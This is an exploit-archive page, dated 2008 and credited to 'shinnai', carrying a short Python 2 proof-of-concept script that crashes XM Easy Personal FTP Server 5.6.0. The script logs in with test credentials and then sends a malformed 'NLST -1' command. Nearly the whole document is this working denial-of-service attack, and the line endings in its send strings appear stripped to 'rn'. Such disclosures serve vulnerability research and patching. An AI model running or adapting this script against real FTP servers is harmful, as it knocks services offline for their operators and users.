XM Easy Personal FTP Server 5.6.0 Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XM Easy Personal FTP Server 5.6.0 Remote Denial of Service Exploit
# Published : 2008-10-13
# Author : shinnai
# Previous Title : Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC
# Next Title : RaidenFTPD 2.4 build 3620 Remote Denial of Service Exploit

print "--------------------------------------------------------------"
print "# XM Easy Personal FTP Server 5.6.0 Remote Denial of Service"
print "# url: http://www.dxm2008.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://www.shinnai.net"
print "--------------------------------------------------------------"

import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   conn = s.connect(("127.0.0.1",21))
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('USER testrn')
   print "Client -> USER: test"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('PASS testrn')
   print "Client -> PASS: test"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('NLST -1rn')
   print "Client -> NSLT: -1"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)
except:
   print "- Unable to connect. exiting."

# www.Syue.com [2008-10-13]